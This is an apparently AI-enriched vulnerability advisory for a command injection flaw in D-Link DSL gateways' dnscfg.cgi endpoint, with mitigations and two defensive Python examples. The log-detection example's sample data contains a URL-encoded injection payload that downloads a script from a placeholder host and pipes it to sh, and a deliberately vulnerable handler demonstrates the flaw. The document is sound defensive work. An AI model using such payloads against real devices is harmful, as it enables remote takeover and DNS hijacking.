CVE-2026-0625: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in D-Link DSL-2640B
Multiple D-Link DSL gateway devices contain a command injection vulnerability in the dnscfg.cgi endpoint due to improper sanitization of user-supplied DNS configuration parameters. An unauthenticated remote attacker can inject and execute arbitrary shell commands, resulting in remote code execution. The affected endpoint is also associated with unauthenticated DNS modification (“DNSChanger”) behavior documented by D-Link, which reported active exploitation campaigns targeting firmware variants of the DSL-2740R, DSL-2640B, DSL-2780B, and DSL-526B models from 2016 through 2019. Exploitation evidence was observed by the Shadowserver Foundation on 2025-11-27 (UTC). Affected devices were declared end-of-life/end-of-service in early 2020.
AI Analysis
Technical Summary
CVE-2026-0625 is an OS command injection vulnerability (CWE-78) in the dnscfg.cgi endpoint of the D-Link DSL-2640B and related DSL gateway devices. The root cause is that user-supplied DNS configuration parameters are passed into an OS command without neutralizing shell metacharacters, so an attacker who can reach the endpoint can append arbitrary shell commands that execute on the gateway. The endpoint requires no authentication and exploitation needs no user interaction, so any device whose administrative interface is reachable from the attacker's network position can be compromised. The same endpoint is linked to the unauthenticated DNS modification ("DNSChanger") attacks that D-Link reported being exploited in the wild against multiple DSL models from 2016 through 2019. Although the affected devices reached end-of-life in early 2020, the Shadowserver Foundation observed exploitation on 2025-11-27, so the exposure is current rather than historical. The vulnerability carries a CVSS 4.0 base score of 9.3 (critical), with high impact on confidentiality, integrity, and availability. No patches or firmware updates are available from the vendor, so successful exploitation yields remote code execution and full device compromise, with network infiltration or DNS hijacking as likely follow-on activity.
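The pattern behind CWE-78 here, as an added example that is not code from this page, from D-Link, or from the affected firmware: a Python stand-in for a firmware command handler that splices a DNS server parameter into a shell command string, beside a hardened version that allow-lists IP addresses and never reaches a shell. The parameter name, the "echo nameserver" command, and the injected payload are assumptions modelled on the usual resolv.conf-writing pattern; the real dnscfg.cgi code is not shown on this page. The unsafe variant only echoes, so it is harmless to run.

```python
import ipaddress
import subprocess


def render_resolv_conf_unsafe(dns_server: str) -> str:
    """Vulnerable pattern (CWE-78): untrusted input spliced into a shell string.

    Firmware typically does this in C with sprintf()+system(); this Python
    stand-in keeps the same failure mode but only echoes instead of writing
    /etc/resolv.conf. Input "8.8.8.8; echo INJECTED" runs a second command.
    """
    cmd = "echo nameserver " + dns_server          # assumption: hypothetical handler
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_dns_server(value: str) -> str:
    """Allow-list validation: the only acceptable input is an IP address.

    ipaddress.ip_address() raises ValueError on anything else, including
    values carrying ';', '|', '&', backticks or '$(' payloads, so there is no
    blacklist of metacharacters to get wrong.
    """
    return str(ipaddress.ip_address(value.strip()))


def render_resolv_conf_safe(dns_server: str) -> str:
    """Hardened form: validate first, then build the file content directly.

    No shell is involved at all, so there is nothing left to inject into.
    In firmware the result would be written with fopen()/fwrite(), not system().
    """
    return f"nameserver {validate_dns_server(dns_server)}\n"


def is_rejected(value: str) -> bool:
    """True when the hardened handler refuses the value."""
    try:
        render_resolv_conf_safe(value)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    payload = "8.8.8.8; echo INJECTED"               # constructed test input
    print("unsafe handler output:", repr(render_resolv_conf_unsafe(payload)))
    print("hardened handler rejects payload:", is_rejected(payload))
    print("hardened handler accepts 8.8.8.8:", repr(render_resolv_conf_safe("8.8.8.8")))
```

The point of the hardened version is not that it escapes metacharacters better; it is that the accepted input space (an IP address) is defined positively and the configuration is written without ever constructing a command line.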
Potential Impact
For European organizations, this vulnerability poses a significant threat, especially for those still using legacy D-Link DSL gateway devices in their network infrastructure. Successful exploitation can lead to complete device takeover, enabling attackers to manipulate DNS settings, redirect traffic, intercept sensitive data, or launch further attacks within the internal network. This can compromise confidentiality, integrity, and availability of organizational data and services. Critical infrastructure providers, small and medium enterprises, and residential ISPs relying on these devices are particularly at risk. The lack of vendor support and patches increases the likelihood of persistent exploitation. Additionally, DNS manipulation can facilitate phishing, malware distribution, and espionage campaigns targeting European entities. The ongoing exploitation evidence suggests that threat actors continue to leverage this vulnerability, underscoring the urgency for mitigation.
Mitigation Recommendations
Given the absence of official patches, European organizations should prioritize the following mitigation steps:
1) Identify and inventory all D-Link DSL-2640B devices and the related DSL-2740R, DSL-2780B and DSL-526B models in the estate, including ISP-supplied gateways at branch and home-office sites.
2) Replace end-of-life devices with supported hardware that still receives security updates; this is the only complete fix, since no firmware update will be issued for these models.
3) Until replacement, block access to the gateway's HTTP administrative interface from the WAN side at the upstream firewall or ISP edge, and verify from an external vantage point that the admin port is no longer reachable. The vulnerable endpoint is unauthenticated, so reachability alone is sufficient for exploitation.
4) Where the device must stay in service, place it on a segmented network with strict access controls so that a compromised gateway cannot reach internal systems.
5) Monitor for requests to dnscfg.cgi from sources other than the management network, and for parameter values that contain shell metacharacters (";", "|", "&", backticks, "$(") rather than plain IP addresses; either is an indicator of the injection or DNS-change activity described above.
6) Periodically compare the resolvers the gateway hands out with the expected ones, and use network-level DNS filtering or egress rules that restrict DNS traffic to approved resolvers, so that a hijacked gateway configuration cannot silently redirect clients.
7) Educate IT staff about the risks of legacy device usage and the importance of timely hardware replacement.
8) Where the gateway is ISP-managed, ask the ISP to confirm its model and firmware status and to replace it, since the vendor will not supply updates.
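Detection logic for the monitoring steps above, as an added example that is not part of the advisory: it scans access logs in Common Log Format for dnscfg.cgi requests and flags shell metacharacters or non-IP parameter values (injection attempts) as well as any request from outside an assumed management network (unauthenticated DNS changes of the DNSChanger kind). The sample log lines are constructed, the parameter names dnsPrimary and dnsSecondary are assumptions (the page names only the endpoint), and the management range 192.168.1.0/24 is a placeholder. The gateway itself will not normally produce such logs, so the input would come from an upstream proxy, an IDS HTTP log, or a packet capture converted to this format.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Common Log Format (not real captures).
# Parameter names dnsPrimary/dnsSecondary are assumptions.
SAMPLE_LOG = """\
192.168.1.20 - - [27/Nov/2025:09:14:02 +0000] "GET /dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=1.1.1.1 HTTP/1.1" 200 512
198.51.100.7 - - [27/Nov/2025:09:14:05 +0000] "GET /dnscfg.cgi?dnsPrimary=8.8.8.8%3Bwget%20http%3A%2F%2F203.0.113.5%2Fx.sh%7Csh&dnsSecondary=1.1.1.1 HTTP/1.1" 200 512
198.51.100.7 - - [27/Nov/2025:09:14:09 +0000] "GET /dnscfg.cgi?dnsPrimary=198.51.100.53&dnsSecondary=198.51.100.54 HTTP/1.1" 200 512
192.0.2.44 - - [27/Nov/2025:09:15:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

# source, timestamp, method, request target, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Characters that let a value escape a shell word; newline covers CRLF tricks.
SHELL_META = re.compile(r"[;|&`$(){}<>\n]")
# Assumption: only these networks may legitimately change gateway settings.
MGMT_NETS = [ipaddress.ip_network("192.168.1.0/24")]


def is_ip_address(value: str) -> bool:
    """The only legitimate shape for a DNS server parameter."""
    try:
        ipaddress.ip_address(value.strip())
        return True
    except ValueError:
        return False


def analyze_line(line: str):
    """Return a finding dict for a suspicious dnscfg.cgi request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    if not parts.path.endswith("/dnscfg.cgi"):
        return None

    reasons, injection = [], False
    # parse_qs percent-decodes, so an encoded %3B is inspected as ';'.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if SHELL_META.search(value):
                injection = True
                reasons.append(f"shell metacharacter in {name}={value!r}")
            elif not is_ip_address(value):
                reasons.append(f"non-IP value in {name}={value!r}")

    # Even a well-formed request is a DNS change if it did not come from
    # the management network: the endpoint needs no authentication.
    src_ip = ipaddress.ip_address(src)
    if not any(src_ip in net for net in MGMT_NETS):
        reasons.append(f"dnscfg.cgi reached from non-management source {src}")

    if not reasons:
        return None
    return {"src": src, "time": ts, "method": method, "status": int(status),
            "injection": injection, "reasons": reasons}


def scan(log_text: str):
    """Run analyze_line over every line and keep the findings, in log order."""
    return [hit for hit in map(analyze_line, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        label = "INJECTION" if hit["injection"] else "dns-change"
        print(hit["time"], hit["src"], label, "; ".join(hit["reasons"]))
```

On the constructed input the first line is clean (management source, IP-shaped values), the second is flagged as an injection attempt because the decoded dnsPrimary value carries ";" and "|", and the third is flagged only because a syntactically valid DNS change arrived from an external address. Tune MGMT_NETS to the real management range before deploying, and treat any hit on the third rule as a configuration change to verify on the device.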
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium
Technical Details
- Data Version: 5.2
- Assigner Short Name: VulnCheck
- Date Reserved: 2026-01-05T20:59:29.705Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 695c2bac3839e441759217e3
Added to database: 1/5/2026, 9:22:52 PM
Last enriched: 1/5/2026, 9:37:08 PM
Last updated: 1/8/2026, 12:30:14 PM